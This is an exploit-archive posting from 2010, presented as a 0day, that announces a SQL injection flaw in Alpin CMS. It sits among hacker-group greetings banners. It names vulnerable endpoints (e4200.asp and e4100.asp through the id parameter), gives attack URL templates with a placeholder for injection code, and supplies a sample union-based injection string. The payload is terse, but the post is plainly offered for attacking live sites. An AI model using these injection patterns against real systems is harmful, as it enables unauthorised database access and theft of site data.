# Exploit Title: Alpin CMS SQL Injection Vulnerability # Date: 21-06-2010 # Author: Th3 RDX # Software Link: # Version: 1.0 # Tested on: Demo Site # category: webapp # Code : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################## %// ----- [ Founder ] ----- Th3 RDX ----- [ E - mail ] ----- th3rdx@gmail.com %\\ ############################################################################## ############################################################################## %// ----- [Title] ----- Alpin CMS (news.php) SQL Injection Vulnerability ----- [ Vendor ] ----- http://www.alpin-cms/ %\\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = e4100.asp?id=12359892693+and+1=0+ Union 2,3,4,5,6 (tables & column) } [SQLi] http://server/alpin-cms/e4200.asp?id=1259892693[CODE] [SQLi] http://server/alpin-cms/e4100.asp?id=2[CODE] %\\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 21 June 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #End 0Day#